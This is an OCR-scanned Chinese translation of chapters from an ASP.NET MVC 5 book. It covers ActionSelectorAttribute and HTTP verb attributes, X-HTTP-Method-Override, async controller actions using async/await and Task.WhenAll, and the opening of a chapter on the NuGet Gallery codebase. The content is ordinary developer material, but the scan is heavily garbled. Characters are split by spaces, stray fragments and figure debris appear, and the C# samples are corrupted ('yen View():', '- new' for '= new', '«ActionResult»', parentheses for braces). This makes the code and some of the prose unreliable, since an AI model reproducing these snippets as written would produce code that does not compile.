上 的 所 有 方法 ， 我 们 就 可 以 通过 查看 列表 中 应 用 ActionSelectorAttribute 特 性 的 方法 的 所 有 实 
例 来 进一步 削减 清单 。 

ActionSelectorAttribute 特 性 是 一 个 抽象 基 类 ， 它 对 操作 方法 可 以 响应 的 请 求 提 供 了 细 粒 
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度 的 控制 。 该 特性 的 API 中 只 包含 一 个 方法 : 


public abstract class ActionSelectorAttribute : Attribute 

t 

public abstract bool IsValidForRequest (ControllerContext controllerContext, 
MethodInfo methodInfo); 

} 


此 时 ， 调 用 器 就 在 列表 中 查找 任何 包含 该 特性 的 子 特性 的 方法 ， 并 调用 每 一 个 子 特性 的 
IsValidForRequest 方 法 。 如 果 任 何 一 个 特性 返回 了 false， 那 么 应 用 了 该 特性 的 方法 将 从 当前 请 
求 的 潜在 操作 方法 列表 中 移 除 。 

最 后 ， 列 表 中 应 该 剩余 一 个 方法 让 调用 器 调用 。 如 果 列 表 中 剩余 多 个 方法 来 处 理 当前 请 
求 ， 调 用 器 就 会 抛 出 一 个 异常 ， 指 示 方 法 的 调用 存在 二 义 性 。 如 果 没 有 方法 可 以 处 理 该 请 求 ， 
调用 器 就 会 调用 控制 器 的 HandleUnknownAction 方 法 。 

ASPNET MVC 框 架 包 含 了 该 基本 特性 的 两 个 实现 版 本 : AcceptVerbsAttribute 和 
NonActionAttribute。 


AcceptVerbsAttribute 

AcceptVerbsAttribute 是 ActionSelectorAttribute 的 具体 实现 , 它 使 用 当前 HTTP 请 求 的 HTTP 
方法 (动词 ) 来 决定 一 个 方法 是 否 能 够 处 理 当 前 请 求 的 操作 ， 从 而 允许 我 们 拥有 方法 重 载 ， 但 
这 些 重 载 方法 是 能 够 响应 不 同 HTTP 动 词 的 操作 。 

MVC 使 用 [HttpGet]、[HttpPost]、[HttpDelete]、[HttpPut] 和 [HttpHead] 特 性 为 HTTP 方 法 限 
制 提供 了 更 加 简洁 的 语法 。 这 些 是 以 前 的 [AcceptVerbs(HttpVerbs.Get)] 、 [AcceptVerbs 
(HttpVerbs.Post)] ~ [AcceptVerbs(HttpVerbs.Delete)] 、[AcceptVerbs(HttpVerbs.Put)] 和 [AcceptVerbs 
(HttpVerbs.Head)] 特 性 的 别名 ， 使 得 这 些 特 性 更 便于 输入 和 阅读 。 

例如 ， 我 们 想 要 两 个 Edit 方 法 版 本 : 一 个 用 来 泻 染 编辑 表单 ， 另 外 一 个 当 提 交 表单 时 ， 
处 理 相 应 的 请 求 : 

[HttpGet] 

public ActionResult Edit(string id) 

yen View():; 

t 

当 一 个 请 求 /home/edit 的 POST 请 求 到 达 时 ,操作 调用 器 创建 一 个 匹配 edit 操 作 名 称 的 所 有 
控制 器 方法 的 列表 。 在 本 例 中 ， 列 表 最 终 会 得 有 两 个 方法 。 随 后 ， 调 用 器 查看 所 有 应 用 到 每 
个 方法 的 ActionSelectorAttribute 实 例 ， 并 调用 它 的 IsValidForRequest 方 法 。 如 果 某 个 方法 的 特 
性 返回 true， 该 方法 就 会 被 认为 对 当前 操作 是 有 效 的 。 

例如 ， 在 本 例 中 ， 当 询问 第 一 个 方法 是 否 可 以 处 理 POST 请 求 时 ， 因 为 它 只 能 处 理 GET 
请 求 ， 所 以 它 将 用 false 响 应 。 由 于 第 二 个 方法 可 以 处 理 POST 请 求 ， 因 此 ， 它 会 用 true 响 应 ， 
它 也 正 是 选择 用 来 处 理 该 操作 的 方法 。 

如 果 没 有 发 现 满足 这 些 条 件 的 方法 ， 调 用 器 就 会 调用 控制 器 上 的 HandleUnknownAction 方 
法 来 提供 缺失 操作 的 名 称 。 如 果 发 现 有 多 个 操作 方法 满足 这 些 条 件 ， 框 架 就 会 抛 出 一 个 
InvalidOperationException 异 常 。 
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模拟 RESTful 动 词 

大 部 分 浏览 器 在 正常 浏览 网 页 期 间 只 支持 两 个 HTTP 动 词 : GET 和 了 POST。 然而，REST 
架构 风格 可 以 利用 一 些 额外 的 标准 动词 : DELETE、HEAD 和 PUT。ASPNET MVC 人 允许 我 们 
通过 Html.HttpMethodOverride 方 法 模拟 这 些 动词 ， 该 方法 采用 一 个 参数 来 指示 一 个 标准 的 
HTIP 动 词 (DELETE、GET、HEAD、POST 和 PUT)。 在 内 部 ， 这 通过 发 送 一 个 
X-HTTP-Method-Override 表 单字 段 中 的 动词 来 实现 。 

HttpMethodOverride 的 行为 由 [AcceptVerbs] 特 性 和 新 的 短 动词 特性 来 补充 : 

e HttpPostAttribute 

e HttpPutAttribute 

e HttpGetAttribute 

e HttpDeleteAttribute 

e HttpHeadAttribute 

虽然 HTTP 的 重 写 方法 只 能 在 真实 的 请 求 是 POST 请 求 时 使 用 ,但 是 重 写 值 也 可 以 在 HTTP 
头 或 查询 字符 串 值 中 以 名 称 / 值 对 的 形式 指定 。 


有 关 重 写 HTTP 动 词 的 更 多 信息 

尽管 通过 X-HTTP-Method-Override 重 写 HTTP 动 词 不 是 官方 标准 , 但 是 它 已 经 变 成 一 个 普 
遍 使 用 的 约定 。 它 首先 由 Google 公 司 在 2006 年 作为 Google 数 据 协 议 (Google Data Protocol) 的 一 
部 分 引入 (http:Wcode.google.comy/apis/gdata/docs/2.0/basics .html)， 和 截止 到 现在 ， 它 已 经 在 各 种 
RESTful Web API 和 Web 框 架 中 实现 。Ruby on Rails 也 遵循 同样 的 模式 ， 但 不 同 之 处 在 于 它 使 
用 的 是 _ method 表 单字 段 ， 而 不 是 X-HTTP-Method-Override。 

MVC 只 允许 重 写 POST 请 求 。 框 架 首 先 从 HITTP 头 部 查找 重 写 的 动词 ， 然 后 在 传递 的 值 中 
查找 ， 最 后 从 查询 字符 串 值 中 查找 。 


2. 调用 操作 
接 下 来 ， 调 用 器 使 用 模型 绑 定 器 (第 4 章 4.4 节 已 详细 介绍 ) 为 操作 方法 的 每 一 个 参数 映射 
值 ， 然 后 调用 操作 方法 本 身 的 内 容 。 此 时 ， 调 用 器 创建 一 个 与 当前 操作 方法 相关 的 过 滤器 列 


表 ， 并 按照 正确 的 顺序 调用 过 滤器 和 操作 方法 。 想 了 解 更 多 的 信息 ， 请 参阅 第 15 章 的 “操作 
过 滤器 ”小 节 。 


16.7.6 ”使 用 异步 控制 器 操作 


ASPNET MVC 2 及 其 后 续 版 本 包含 了 对 异步 请 求 管道 的 完全 支持 。 这 个 请 求 管 道 的 作用 
是 允许 Web 服 务 器 处 理 长 时 间 运 行 的 请 求 一 比如， 那些 花费 大 量 时 间 等 待 网 络 或 数据 库 操 
作 完 成 的 请 求 仍 能 保持 对 其 他 请 求 的 响应 。 就 这 一 点 而 言 , 异步 代码 是 更 加 高 效 的 服务 请 求 ， 
而 不 是 快速 地 服务 一 个 单独 的 请 求 。 

虽然 ASPNET MVC 的 早期 版 本 支持 异步 操作 , 但 在 MVC 4 之 前 编写 异步 控制 器 非常 困难 。 
MVC 4 及 后 续 版 本 通过 利用 最 近 的 .NET Framework 特 征 ， 简 化 了 这 一 过 程 : 
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e NET 4 引入 了 一 个 新 的 任务 并 行 库 (Task Parallel Library) 来 简化 在 NET 平 台 上 开发 并 
行 和 并 发 程序 的 工作 。 任 务 并 行 库 包含 一 个 新 类 型 一 一 Task 一 一 来 代表 异步 操作 。 
MVC 通 过 允许 我 们 在 操作 方法 中 返回 Task<ActionResult> 来 支持 这 一 功能 。 
e .NET 4.5 通 过 两 个 新 关键 字 一 一 async 和 await 一 一 进一步 简化 了 异步 编程 async 修饰 符 
告知 编译 器 包含 异步 方法 和 lambda 表 达 式 的 方法 是 异步 的 , 这 些 方法 往往 都 包含 一 个 
或 多 个 需要 长 期 运行 的 操作 。 在 异步 方法 上 使 用 await 关 键 字 表 示 方 法 应 该 被 挂 起 , 直 
到 完成 等 待 的 任务 。 
e NET 4 并 行 任务 库 和 .NET 4.5 的 async 和 await 关 键 字 的 结合 被 称 为 基于 任务 的 异步 模 
式 (Task-based Asynchronous Pattern) 或 TAP。 相 对 于 MVC 2 和 3 中 的 方案 ,使 用 MVC5 
中 的 TAP 编 写 异步 控制 器 操作 非常 简单 。 本 节 主 要 使 用 MVC 5 中 基于 .NET 4.5 的 TAP。 
要 理解 异步 和 同步 ASPNET 代 码 之 间 的 区 别 ， 必 须 首先 理解 Web 服 务 器 是 如 何 处 理 请 求 
的 。IIS 维 护 了 一 个 用 来 服务 请 求 的 空闲 线程 的 集合 (线程 池 )。 当 一 个 请 求 进入 时 ， 线 程 池 中 
的 一 个 线程 被 调度 来 处 理 进入 的 请 求 。 当 一 个 线程 正在 处 理 一 个 请 求 时 ， 它 就 不 能 用 来 处 理 
其 他 任何 请 求 , 直到 它 完成 第 一 个 请 求 的 处 理 。 IS 同 时 服务 多 个 请 求 的 能 力 是 基于 一 个 假设 : 
即 ， 线 程 池 中 有 空闲 的 线程 来 处 理 进入 的 请 求 。 
现在 考虑 一 个 操作 ， 该 操作 将 网 络 调用 作为 自己 执行 的 一 部 分 ， 并 且 网 络 调用 需要 花费 
2 秒 钟 才能 够 完成 。 从 网 站 访问 者 的 角度 来 看 ， 服 务 器 大 约 需 要 花费 2 秒 钟 的 时 间 响 应 他 或 她 
的 请 求 (如 果 只 考虑 Web 服 务 器 本 身 的 开销 的 话 )。 在 同步 世界 里 ,处理 该 请 求 的 线程 会 被 阻塞 
2 秒 钟 ， 以 完成 网 络 调用 。 也 即 ， 由 于 该 线程 正在 等 待 网 络 调用 完成 ， 因 此 ， 它 不 能 执行 当前 
请 求 的 其 他 有 用 任务 ; 又 由 于 它 正在 处 理 第 一 个 请 求 , 因此 也 不 能 执行 其 他 请 求 的 有 用 任务 。 
这 种 情形 下 的 线程 被 称 为 阻塞 线程 (blocked thread)。 通 常情 况 下 这 不 是 问题 ， 因 为 线程 池 足 
够 大 来 应 对 这 种 应 用 场合 。 然 而 ， 在 处 理 多 个 并 发 请 求 的 大 型 应 用 程序 中 ， 这 可 能 会 因为 需 
要 等 待 数据 而 阻塞 许多 线程 ， 从 而 导致 没有 线程 池 中 没有 足够 的 空闲 线程 来 调度 服务 新 进入 
的 请 求 。 这 种 情形 被 称 为 线程 饥饿 (thread starvation)， 它 会 严重 影响 网 站 的 性 能 。 如 图 16-16 
所 示 。 
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图 16-16 


在 一 个 异步 管道 中 , 线程 不 会 因 等 待 数据 而 阻塞 。 当 一 个 长 时 间 运 行 的 应 用 程序 (比如 网 
络 调用 ) 开 始 时 ， 操 作 在 等 待 数据 期 间 会 自动 放弃 对 处 理 线程 的 控制 。 从 本 质 上 讲 ， 操 作 告诉 
线程 ,“ 在 我 能 继续 之 前 需要 花费 一 段 时 间 ， 所 以 现在 不 用 费劲 等 着 我 。 当 我 需要 的 数据 能 够 
获取 时 ， 我 会 通知 [IS”。 然 后 该 线程 返回 到 线程 池 ， 以 便 可 以 继续 处 理 另 一 个 请 求 ， 从 本 质 
上 说 ， 当 等 待 数据 时 ， 当 前 请 求 是 暂停 的 。 重 要 的 是 ， 当 一 个 请 求 处 于 这 种 状态 时 ， 它 会 被 
分 配给 线程 池 中 的 任 一 空闲 线程 ， 所 以 它 不 会 阻塞 将 被 处 理 的 其 他 请 求 。 当 该 操作 的 数据 变 
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得 可 获取 时 ， 网 络 请 求 完 成 事件 会 通知 IS， 因 此 线程 池 中 的 一 个 空闲 线程 会 被 调度 继续 处 理 
该 请 求 。 继 续 处 理 该 请 求 的 线程 可 能 是 ， 也 可 能 不 是 先前 处 理 该 请 求 的 线程 ， 但 是 这 个 开发 
人 员 不 必 担 心 ， 它 是 由 管道 负责 的 ， 如 图 16-17 所 示 。 
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请 注意 ， 在 上 面 的 示例 中 ， 最 终 用 户 在 他 发 送 请 求 和 接受 到 服务 器 的 响应 之 间 看 到 的 仍 
是 一 个 2 秒 钟 的 延迟 。 这 也 是 前 面 所 讲 的 异步 主要 是 高 效率 而 不 是 提高 一 个 单独 请 求 的 响应 速 
度 的 意义 。 尽 管 异步 花费 了 与 同步 一 样 的 时 间 响 应 用 户 请 求 ， 但 在 异步 管道 中 ， 服 务 器 不 会 
在 等 待 完成 第 一 个 请 求 时 而 阻塞 其 他 有 用 的 任务 的 执行 。 


1. 同步 与 异步 管道 的 选择 


以 下 是 决定 使 用 同步 还 是 异步 管道 的 一 些 指导 原则 。 注 意 ， 这 些 只 是 指导 原则 ， 还 要 根 
据 每 个 应 用 程序 具体 的 要 求 来 选择 。 

使 用 同步 管道 的 指导 原则 如 下 : 

e 操作 简单 或 者 能 在 短 时 间 内 执行 完毕 。 

e 简单 性 和 可 测试 性 是 重要 的 。 

e 操作 是 CPU 密 集 型 ， 而 非 IO 密 集 型 。 

使 用 异步 管道 的 指导 原则 如 下 : 

e 测试 结果 表明 阻塞 操作 是 站 点 性 能 的 瓶颈 。 

o 并 行 性 比 代码 简单 更 重要 。 

e 操作 是 IO 密集 型 ， 而 非 CPU 密集 型 。 
因为 异步 管道 比 同步 管道 有 更 多 的 基础 结构 和 开销 ,所 以 异步 代码 比 同步 代码 更 难 测试 。 
测试 异步 代码 需要 模拟 更 多 的 基础 结构 ， 而 且 也 需要 考虑 代码 可 以 按照 不 同 的 顺序 执行 。 最 
后 ， 一 个 CPU 密集 型 的 操作 可 能 真 的 不 利于 转换 为 一 个 异步 操作 ， 因 为 这 样 会 增加 一 个 开始 
可 能 不 会 阻塞 的 操作 的 开销 。 特 别 地 ， 这 意味 着 在 ThreadPooLQueueUserWorkItem() 方 法 中 执行 
CPU 密集 型 操作 的 代码 不 会 从 使 用 异步 管道 获 益 。 


2. 编写 异步 操作 方法 


使 用 MVC 5 中 的 新 TAP 模 型 编写 的 异步 操作 与 标准 的 (同步 ) 操 作 非 常 相 似 。 下 面 是 把 一 
个 操作 转换 为 一 个 异步 操作 的 一 些 要 求 : 

e 操作 方法 必须 使 用 async 修 饰 符 标记 为 异步 。 

o 操作 必须 返回 Task 或 Task<ActionResult>。 

e 方法 中 的 任何 异步 操作 使 用 await 关 键 字 挂 起 操作 ， 直 到 调用 完成 。 
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例如 ， 考 虑 一 个 为 给 定 区 域 显示 新 闻 的 门户 网 站 。 在 这 个 例子 中 ， 新 闻 通 过 GetNews0 
方法 获取 ,而 GetNews0 方 法 中 包含 了 一 个 需要 长 时 间 运 行 的 网 络 调用 。 一 个 典型 的 同步 操作 
如 下 : 


public class PortalController : Controller { 
public ActionResult News(string city) { 
NewsService newsService - new NewsService(); 
NewsModel news = newsService.GetNews (city); 
return View (news); 
} 
} 


下 面 是 上 面 同步 操作 转换 为 异步 操作 的 代码 : 


public class PortalController : Controller { 
public async Task«ActionResult» News (string city) ( 
NewsService newsService - new NewsService(); 
NewsModel news = await newsService.GetNews (city); 
return View (news); 
} 
} 


正如 前 面 描述 的 ， 我 们 只 是 做 了 三 处 改动 : 为 操作 添加 async 修 饰 符 ， 返 
Task<ActionResult>， 并 在 需要 长 时 间 运 行 的 服务 调用 前 添加 await。 


何 时 只 返回 任务 ? 


回 


我 们 可 能 极 想 知道 MVC 5 为 什么 支持 返回 Task 和 Task<ActionResult>。 不 返回 任何 内 容 ， 
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会 怎样 呢 ? 

事实 证 明 ， 在 需要 长 时 间 运 行 的 服务 操作 中 ， 这 是 非常 有 用 的 。 例 如 ， 我 们 可 能 有 一 个 
需要 长 时 间 运 行 的 服务 操作 ， 比 如 发 送 大 量 的 电子 邮件 ， 或 者 构建 一 个 大 型 报告 。 在 此 类 情 
况 下 ， 没 有 任何 内 容 返 回 ， 没 有 调用 者 监听 。 返 回 Task 与 在 同步 操作 中 返回 void 一 样 ， 两 者 
都 被 转换 为 一 个 EmptyResult 响 应 ， 表 示 没 有 发 送 响应 。 


3. 执行 多 个 并 行 操作 

上 面 示例 代码 不 会 比 一 个 标准 同步 操作 执行 速度 快 多 少 ， 它 只 是 允许 高 效 地 利用 服务 器 
资源 (正如 本 节 开 始 部 分 解释 的 )。 当 一 个 操作 想 同时 执行 多 个 异步 操作 时 ， 异 步 代码 的 优势 
才能 发 挥 出 来 。 例 如 ， 一 个 典型 门户 网 站 不 仅 需要 显示 新 闻 ， 也 需要 显示 体育 、 天 气 和 股票 
等 其 他 信息 。 显 示 这 些 信息 的 操作 方法 的 同步 版 本 可 能 实现 形式 如 下 : 

public class PortalController : Controller { 

public ActionResult Index(string city) { 
NewsService newsService = new NewsService(); 


WeatherService weatherService - new WeatherService(); 
SportsService sportsService = new SportsService(); 


PortalViewModel model = new PortalViewModel { 
News = newsService.GetNews (city), 
Weather = weatherService.GetWeather (city), 
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Sports = sportsService.GetScores (city) 
bi 
return View (model); 
} 


注意 ， 上 面 的 调用 是 顺序 执行 的 ， 所 以 响应 用 户 所 需 的 时 间 等 于 所 有 这 些 单个 调用 所 需 
时 间 的 总 和 。 如 果 调 用 的 时 间 分 别 是 200ms、300ms、400ms， 然 后 整个 操作 的 执行 时 间 就 是 
900ms( 加 上 一 些微 不 足 道 的 开销 )。 
该 操作 的 异步 版 本 采取 下 面 的 形式 : 
public class PortalController : Controller { 
public async Task«ActionResult» Index(string city) ( 
NewsService newsService - new NewsService(); 


WeatherService weatherService = new WeatherService(); 
SportsService sportsService = new SportsService(); 


var newsTask - newsService.GetNewsAsync (city); 
var weatherTask = weatherService.GetWeatherAsync (city); 
var sportsTask = sportsService.GetScoresAsync (city); 


await Task.WhenAll(newsTask, weatherTask, sportsTask); 


PortalViewModel model - new PortalViewModel ( 
News = newsTask.Result, 
Weather - weatherTask.Result, 
Sports - sportsTask.Result 

u 


return View (model); 
) 
) 


注意 ， 异 步 代 码 中 的 所 有 操作 是 并 行 执行 的 ， 因 此 ， 响 应 用 户 需要 的 时 间 等 于 最 长 的 单 
个 调用 时 间 。 如 果 调 用 的 时 间 分 别 是 200ms、300ms 和 400ms， 然 后 整个 操作 的 执行 时 间 就 是 
400ms( 加 上 一 些微 不 足 道 的 开销 )。 


使 用 TASK.WHENALL 调 用 并 行 任务 

请 注意 , 我 们 可 使 用 Task WhenAll0 方 法 并 行 地 执行 多 个 任务 。 我 们 可 能 会 认为 在 每 一 个 
服务 调用 前 添加 await 关 键 字 就 能 使 这 些 服务 并 行 执行 ， 其 实 ， 事 实 并 非 如 此 。 尽 管 直到 长 时 
间 调 用 完成 后 ，await 才 能 释放 线程 ， 但 是 如 果 第 一 个 await 调 用 不 完成 ， 第 二 个 await 调 用 就 不 
会 开始 执行 。Task.WhenAll 会 并 行 地 执行 所 有 任务 ， 并 在 所 有 任务 完成 后 返回 。 


上 面 两 个 示例 中 ,访问 操作 的 URL 都 是 /PortalIndex?city=Seattle (或 /Portal?city=Seattle， 
使 用 默认 的 路 由 )， 而 视图 页 面 的 名 称 也 都 是 Index.cshtml( 因 为 操作 名 称 是 Index)。 

这 是 一 个 典型 例子 。 在 这 个 例子 中 ， 从 最 终 用 户 的 角度 来 讲 ， 使 用 的 async 关 键 字 不 仅 高 
效 ， 而 且 性 能 也 非常 好 。 
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16.8 小结 


本 书 通 篇 都 没有 用 大 量 的 信息 淹没 重要 的 概念 ， 即 便 这 些 信息 是 有 趣 的 ， 同 时 也 尽量 避 
免 探讨 未 介绍 的 组 件 之 间 的 交互 ， 尽 管 它们 之 间 的 交互 是 令 人 感 兴趣 的 ， 也 没有 深入 浏览 令 
笔者 振奋 的 实现 细节 ， 因 为 这 些 细节 可 能 会 阻碍 学 习 者 。 

但 是 ， 本 章 分 享 了 一 些 ASPNET MVC 内 部 工作 原理 和 充分 利用 框架 的 高 级 技术 。 笔 者 
希望 您 能 像 我 们 一 样 喜欢 。 


E. 


ASP.NET MVC 实 战 : 
构建 NuGet.org 网 站 


本 章 内 容 简介 : 

NuGet Gallery 源 码 
WebActivator 

ASP.NET 动 态 数 据 

错误 日 志 记 录 模 块 和 处 理 程序 
性 能 分 析 

数据 访问 

代码 先行 迁移 

使 用 Octopus Deploy 

使 用 Fluent Automation 


其 他 有 用 的 NuGet 包 


要 学 习 诸如 ASPNET MVC 的 框架 ,我 们 需要 读书 。 要 学 习 使 用 框架 构建 真实 世界 的 程序 ， 
我 们 就 需要 读 源码 。 真 实 世界 实现 的 源码 是 一 种 非常 优质 的 资源 ， 可 以 帮助 我 们 学 习 如 何 利 
用 从 书本 上 获取 的 知识 以 构建 应 用 程序 。 

术语 “真实 世界 ” 指 的 是 已 经 很 好 地 投入 使 用 并 能 满足 业务 需求 的 应 用 程序 ， 也 可 指 直 
观 地 理解 为 现在 我 们 就 可 以 使 用 浏览 器 访问 的 应 用 程序 。 由 于 现实 中 ， 期 限 和 不 断 变化 的 需 
求 ， 使 得 真实 世界 的 应 用 程序 与 在 书本 上 看 到 的 应 用 程序 不 同 ， 书 本 上 的 应 用 程序 感觉 颇 有 
几 分 做 作 。 

本 章 回 顾 了 一 个 完全 使 用 ASPNET MVC 开 发 的 真实 世界 应 用 程序 , 如 果 已 经 认真 学 习 了 
第 10 章 内 容 ， 我 们 可 能 已 经 熟悉 了 这 个 应 用 程序 。 不 错 ， 这 个 应 用 程序 就 是 NuGet Gallery。 
我 们 可 以 访问 http://nuget.org/， 查 看 它 面向 公众 的 功能 集 。 目 前 ，ASPNET 和 ASPNET MVC 
团队 仍 积极 参与 其 开发 。 
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由 于 这 个 网 站 仍 在 被 积极 地 使 用 和 开发 ， 所 以 本 章 只 算是 该 网 站 在 某 个 时 刻 的 快照 。 我 
们 回顾 了 从 2010 年 以 来 表现 极 好 的 一 些 功能 。 但 是 要 记 住 ， 在 活跃 的 网 站 和 代码 库 中 ， 一 些 
功能 会 继续 演变 ， 我 们 学 到 的 方法 和 思想 才 是 重要 的 。 


17.1 源码 与 我 们 同 在 


NuGet Gallery 的 源码 与 运行 的 http://nuget.org/ 网 站 代码 一 样 ， 托 管 在 GitHub 上 ， 网 址 是 
https://github.com/nuget/nugetgallery/。 如 果 需 要 把 源码 获取 到 本 地 机 器 上 , 请 认真 阅读 页 面 上 
README 中 的 说 明 书 。 

这 些 说 明 主 要 面向 那些 有 一 定 Git 基 础 ， 并 打算 为 NuGet Gallery 项 目 作 贡献 的 开发 人 员 。 
如 果 只 是 想 查 看 源码 ， 不 打算 使 用 Git， 我 们 也 能 下 载 一 个 zip 文 件 ，https://github.com/NuGet/ 
NuGetGallery/archive/master.zip。 

在 本 地 机 器 上 下 载 源码 之 后 ， 按 照 README 中 的 步骤 操作 ( 见 https://github.com/NuGet/ 
NuGetGallery/)。 确 认 满 足 必要 的 先决 条 件 后 ，README 要 求 我 们 运行 构建 脚本 .\build， 以 确 
认 开 发 环境 已 被 正确 设置 。 该 脚本 会 构建 解决 方案 ， 并 运行 所 有 的 单元 测试 。 如 果 成 功 ， 则 
说 明 我 们 配置 正确 。 


注意 : 构建 脚本 假设 路 径 中 包含 msbuild.exe。 如 果 不 包含 ， 则 可 以 从 一 个 
Visual Studio 命 令 提 示 中 运行 构建 脚本 , 或 者 在 命令 提示 窗口 中 执行 下 面 的 命令 : 


Gif exist "%ProgramFiles%$\MSBuild\12.0\bin" set 4 
PATH-$ProgramFiles$MMSBuildM12.0Nbin; $PATH$ 

(if exist "%ProgramFiles (x86) %\MSBuild\12.0\bin" set 4 
PATH-$ProgramFiles (x86) %\MSBuild\12.0\bin;%PATH% 


TE Visual Studio 中 打开 解决 方案 之 前 ， 一 定 要 按照 步骤 正确 设置 本 地 开发 website 目 录 。 为 
了 简化 测试 ， 本 地 开发 实例 使 用 了 免费 的 localtestme DNS 服务 。 该 服务 包含 一 个 通配符 环 回 
了 映射， 所 以 localtestme 的 所 有 子 域 会 映射 到 


127.0.0.1( 通 常 称 为 localhost)。NuGet Gallery 的 开 à 9-88 sl- 
发 配置 步骤 包括 执行 一 个 脚本 (tools\Enable- e ttm Mose M B 
LocalTestMe.ps1)， 该 脚本 会 为 nuget.localtest.me D 
创建 一 个 自 签名 的 SSL 证 书 , 并 将 其 映射 到 NuGet e E d 
Gallery 代 码 的 本 地 开发 实例 。 关 于 localtest.me 服 aa 
务 的 更 多 信息 ， 请 访问 http:/readme .localtestme。 a 

在 Visual Studio 中 打开 解决 方案 时 , 会 注意 到 nr 
4 个 功能 区 : Backend. Frontend. Operations fil DE EE 


Core( 在 应 用 程序 根 目录 下 )。 这 4 个 功能 区 总 共 包 
含 7 个 项 目 ， 如 图 17-1 所 示 。 


图 17-1 
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注意 ”其 中 的 两 个 Facts 项 目 包 含 项 目的 所 有 单元 测试 。 
NuGet Gallery 的 单元 测试 使 用 XUnitNET Framework 一 一 一 个 干净 美观 、 精 
心 设计 的 轻 量 框 架 一 一 编写 。 这 么 说 不 是 因为 XUnitNET 的 作者 之 一 Brad Wilson 


也 是 本 书 的 一 个 作者 。 他 也 曾 是 ASPNET MVC 团 队 的 一 员 。 所 以 ，Brad 非 常 
"HE, 

在 XUnitNET 中 ， 测试 被 称 为 fcts， 用 FactAttribute 表 示 。 这 也 正 是 将 单元 测 
试 项 目 命名 为 Facts 的 原因 。 


解决 方案 的 演化 很 有 意思 ， 也 很 有 说 明 意 义 。 在 本 书 之 前 的 版 本 中 ， 解 决 方案 中 只 有 两 
个 项 目 : Facts 和 Website， 如 图 17-2 所 示 。 


LLL 
a alala 
ZJ Solution 'NuGetGallery' (2 projects) 
4 TẸ Solution Items 
IE) NuGetGallery.msbuild 


E README markdown 
GÀ Facts 


ÉR Website 


图 17-2 
我 们 解释 了 为 什么 解决 方案 中 只 包含 两 个 项 目 : 


许多 ASPNET MVC 应 用 程序 都 是 过 早 地 把 解决 方案 分 成 多 个 不 同 的 类 库 。 这 样 的 状况 源 
于 ASPNET 早 期 版 本 的 延期 ， 在 ASPNET 早 期 版 本 中 ， 单 元 测试 项 目 中 不 能 引用 网 站 。 人 们 
通常 创建 一 个 包含 所 有 核心 逻辑 的 类 库 ， 然 后 从 单元 测试 中 引用 这 个 类 库 。 

这 样 做 忽略 了 一 个 事实 , ASPNET MVC 项 目 是 一 个 类 库 ! 在 单元 测试 项 目 中 引用 这 个 项 
目 是 可 以 实现 的 ， 正 如 Facts 项 目 所 做 的 那样 。 

但 是 把 一 个 解决 方案 分 解 成 多 个 项 目的 其 他 原因 是 什么 呢 ， 关 注 点 分 离 ? 在 需求 产生 之 
前 ， 把 一 个 解决 方案 分 割 成 多 个 项 目 不 可 能 会 魔法 般 地 分 离 关 注 点 。 关 注 点 分 离 关注 的 是 职 
责 分 离 ， 而 不 仅 是 把 代码 分 割 到 多 个 程序 集中 。 

NuGet 团 队 知道 项 目的 大 部 分 代码 都 是 针对 这 个 项 目的 ， 而 不 能 广泛 地 重复 使 用 。 当 编 
写 的 代码 可 以 广泛 地 重复 使 用 时 ， 我 们 可 以 把 这 些 代码 封装 成 单独 的 NuGet 包 ， 并 安装 到 项 
目 中 。WebBackgrounder 库 和 包 便 是 这 种 应 用 的 一 个 成 功 范例 。 


但 是 现在 ， 解 决 方案 中 有 了 4 个 功能 区 、7 个 项 目 。 原 来 的 建议 是 错误 的 吗 ? 不 是 的 。 

首先 ， 注 意 原来 开发 人 员 不 分 解 解决 方案 的 理由 仍然 是 有 效 的 : 

o 没 必 要 为 了 对 应 用 程序 代码 进行 单元 测试 而 创建 单独 的 项 目 。 

e 没 必 要 为 了 实现 关注 点 分 离 而 创建 单独 的 项 目 。 

e 如 果 有 真正 可 重用 的 代码 , 那么 为 什么 要 把 代码 分 解 到 一 个 单独 的 项 目 中 , 而 不 是 创 
建 一 个 单独 的 NuGet 包 ? 

其 次 ， 注 意 ASPNET MVC 团 队 不 想 在 没有 需求 的 时 候 就 分 解 解决 方案 ， 当 需求 产生 时 ， 
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ASPNET MVC 团 队 基 于 应 用 程序 的 需求 把 解决 方案 分 解 
JF. WE, 他 们 决定 , 为 了 支持 NuGet Gallery 的 巨大 增长 ， 
是 时 候 把 应 用 程序 分 解 成 几 个 单独 的 服务 了 。 如 果 他 们 在 
更 早 的 时 候 进行 分 解 ， 所 做 的 假设 就 有 可 能 是 错误 的 。 

展开 Website 项 目 ， 我 们 会 看 到 许多 文件 夹 ， 如 图 17-3 
所 示 。 每 个 文件 夹 代表 一 种 不 同 的 功能 集合 或 功能 类 型 。 
例如 ，Migrations 文 件 夹 包含 所 有 的 数据 库 迁 移 ， 本 章 后 面 
会 介绍 这 些 内 容 。 

这 里 有 各 种 各 样 的 功能 ， 但 不 包括 项 目 中 使 用 的 第 三 
方 库 。 我 们 可 以 打开 Website 项 目 根 目录 下 的 
packages.config 以 查看 这 里 使 用 的 所 有 技术 .在 撰写 这 部 分 
内 容 时 ， 项 目 中 安装 了 65 个 NuGet 包 ， 大 约 是 在 File | New 
MVC 应 用 程序 中 看 到 的 包 数 的 一 倍 。 尽管 这 不 是 使 用 中 分 
离 产品 的 精确 数量 ， 因 为 一 些 产品 被 分 离 成 多 个 NuGet 包 ， 
但 它 能 够 告诉 我 们 项 目 使 用 了 大 量 的 第 三 方 库 。 介 绍 所 有 
这 些 内 容 需 要 一 本 书 ， 所 以 这 里 笔者 挑选 了 一 些 值 得 注意 
的 领域 进行 讲解 。 这 些 都 是 真实 世界 应 用 程序 需要 处 理 的 
问题 ， 但 这 些 问 题 并 不 全 面 。 


17.2 WebActivator 


许多 第 三 方 库 都 不 只 是 对 一 个 简单 程序 集 的 引用 。 当 应 
用 程序 启动 时 ， 这 些 第 三 方 库 有 时 需要 运行 一 些 配 置 代码 。 
在 过 去 ， 这 就 意味 着 我 们 需要 向 Globalasax 文 件 的 
Application_Start 方 法 中 复制 粘贴 一 些 启动 代码 。 

WebActivator 是 一 个 NuGet 包 。 当 包 中 包含 带 有 引用 程 


? S NuGetGalley Backend 
? O NuGeGallery Backend Cloud 


? O NuGetGallery.Cloud 
b ES NuGetGallery Facts 

b 9 Operations 

b 回 NuGaGaley Core 

bp ES NoGeGallery Core Facts 


图 17-3 


序 集 的 源码 时 ， 它 能 有 效 地 解决 这 个 问题 ， 使 得 NuGet 包 添加 应 用 程序 启动 代码 变 得 简单 。 
